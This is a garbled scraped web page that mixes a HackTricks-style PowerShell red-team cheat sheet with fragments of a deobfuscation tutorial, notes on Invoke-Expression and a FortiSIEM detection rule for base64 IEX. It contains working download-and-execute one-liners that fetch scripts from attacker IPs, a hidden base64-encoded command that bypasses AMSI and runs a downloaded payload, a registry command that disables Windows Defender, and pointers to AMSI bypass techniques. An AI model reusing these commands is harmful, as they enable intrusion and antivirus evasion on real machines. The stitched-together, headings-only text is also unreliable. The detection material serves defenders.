Вызов-выражение

Basic PS commands to start

#List everything loaded
#List everything containing “process”
#Get full helpabout a topic

#CREATE A CREDENTIAL OBJECT

Start-Process -Credential ($cred) -NoNewWindow powershell “iex (New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:443/ipst.ps1’)”

Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!Other ways to support HackTricks:If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!

# Check Port or Single IP

# Check Port List in Single IP
# Check Port Range in single IP
# Check Port List in IP Lists – 80,443,445,8080

# Open SSH to the world
‘SSH (Port 22)’
# Get name, proto, local and rremote ports, remote address, penable,profile and direction

In this part we will analyze the same obfuscated powershell code in another way. Here is the 1st and 2nd part:

Starting point of the obfuscated script

Ending point of the obfuscated script

iex means invoke-expression which is used to execute powershell command or script.

If we do not remove those pieces of code then code will look like this. See below:

Notice the iex at the end. This iex would then execute this 2nd layer obfuscated code in the memory.

We can see some variables.

Now we have saved the new layer of obfuscated code to char.txt file in desktop. Then we save again the char.txt as char.ps1

Then we open the char.ps1 file in the same way in powershell ise and assign a variable $x

Once it is executed in memory, we redirected the output into a charoutput.txt file in desktop.

The same encryption function that we seen in our part 1.

Now this is one way to find out the encryption function. There is another way. We can use powerdecode powershell tool to uncover the obfuscation layer.

From the above link you can download the tool.

Now execute the script by giving .GUI.ps1 command.

We will go for number 1 option

We will decode from single file

Now you need to provide the script that you want to decode or deobfuscate. Now it will ask you what would be your destination folder where this tool will save the decoded script. Please provide that folder. Then it will start removing obfuscation layer.

:/> Как ускорить работу ноутбука (нетбука) с Windows 7 и Windows 10

From the 1st layer obfuscation we get another layer obfuscated code. But i saw that the tool failed to decode the 2nd layer. Which i manually did using cyberchef. Please check part-1 writeup.

But thankfully this code successfully decode this part.

The main thing is, you need to have knowledge how to do it manually, then the rest will do this tool.

For your practice I am giving you another code. This tool will help you to decode this as well.

Thanks. I hope you learn something new from here.

Please Subscribe below.

Standard Aliases for Invoke-Expression:

Invoke-Expression accepts a string and treats it as PowerShell code which allows the construction of dynamic code, this means that you have to be very careful about the string input.

You will have learned that PowerShell treats single and double quoted strings differently, with single quoted strings being interpreted literally, however will strip the quotes from completely, meaning this will work:

If the result of the expression is an empty array, invoke-expression will output

Some examples to demonstrate the difference between and Call:

So far so good, they both work and appear to do the same thing, now lets add a parameter to filter the results:

So using Call fails, but this is a good failure because we generally want to be specific about which command/cmdlet is being called and which parameters are being passed to it.
The correct way to do this with Call is passing the parameter as a separate string:

Examples

Create a variable named $MyExpr and use it to store the text of an expression, then use invoke-expression to actually run the expression:

The built in help for has a bunch of other examples for running against multiple remote computers and using SSH.

:/> Права администратора в Windows 10

“There are only two hard things in Computer Science: cache invalidation and naming things” ~ Phil Karlton

Related PowerShell Cmdlets

# Check status

#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path “HKLM:SOFTWAREPoliciesMicrosoftWindows Defender” -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path

# Check exclusions configured via GPO
KeyName : SoftwarePoliciesMicrosoftWindows DefenderExclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD

KeyName : SoftwarePoliciesMicrosoftWindows DefenderExclusionsPaths
ValueName : C:WindowsTemp
ValueType : REG_SZ

amsi.dll is loaded into your process, and has the necessary exports for any application interact with. And because it’s loaded into the memory space of a process you control, you can change its behaviour by overwriting instructions in memory. Making it not detect anything.

Therefore, the goal of the AMSI bypasses you will are to overwrite the instructions of that DLL in memory to make the detection useless.

AMSI bypass generator web page: https://amsi.fail/

# A Method
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method

# AMSI Bypass in python
# Testing for Amsi Bypass:

AMSI Bypass 2 – Managed API Call Hooking

Check this post for detailed info and the code. Introduction:

This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.

The steps performing API cal hooking of .NET methods are:

AMSI Bypass 3 – SeDebug Privilege

AMSI Bypass – More Resources

Default PowerShell locations

This section defines which fields in matching raw events should be mapped to the incident attributes in the resulting incident.

The available raw event attributes to map are limited to the group by attributes and the aggregate event constraint fields for each subpattern

command = Filter.command,
hostName = Filter.hostName

Download & Execute

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open(‘GET’,’http://10.10.14.9:8000/ipw.ps1′,$false);$h.send();iex $h.responseText
#host a text record with your payload at one of your (unburned) domains and do this:

Download & Execute in background with AMSI Bypass

:/> Файл тмп что это

Start-Process -NoNewWindow powershell “-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=”

Using b64 from linux

Enable WinRM (Remote PS)

#This enables winrm
# Change NetWorkConnection Category to Private

Other connected drives

Detects usage of a base64 encoded “IEX” cmdlet in a process command line. This rule is adapted from https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml

Password from secure string

#List only “Security Update” patches

Time Window

Command and Scripting Interpreter: PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.

Data Source

Windows Sysmon via FortiSIEM Agent

Converting the SDDL String into a Readable Format

Options : CreationTime, CreationTimeUtc, LastAccessTime, LastAccessTimeUtc, LastWriteTime, LastWriteTimeUtc

Remediation Guidance

No remediation guidance specified

Secure String to Plaintext

Password : 1ts
SecurePassword : System.Security.SecureString
Domain : HTB

Or directly parsing form XML:

MITRE ATT&CK® Tactics

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

SubPattern Definitions

This is the named definition of the event query, this is important if multiple subpatterns are defined to distinguish them.

SubPattern Query

This is the query logic that matches incoming events

Group by Attributes

This defines how matching events are aggregated, only events with the same matching attribute values are grouped into one unique incident ID

Aggregate Constraint

This is most typically a numerical constraint that defines when the rule should trigger an incident

Как анализировать обфускационный код powershell, часть 3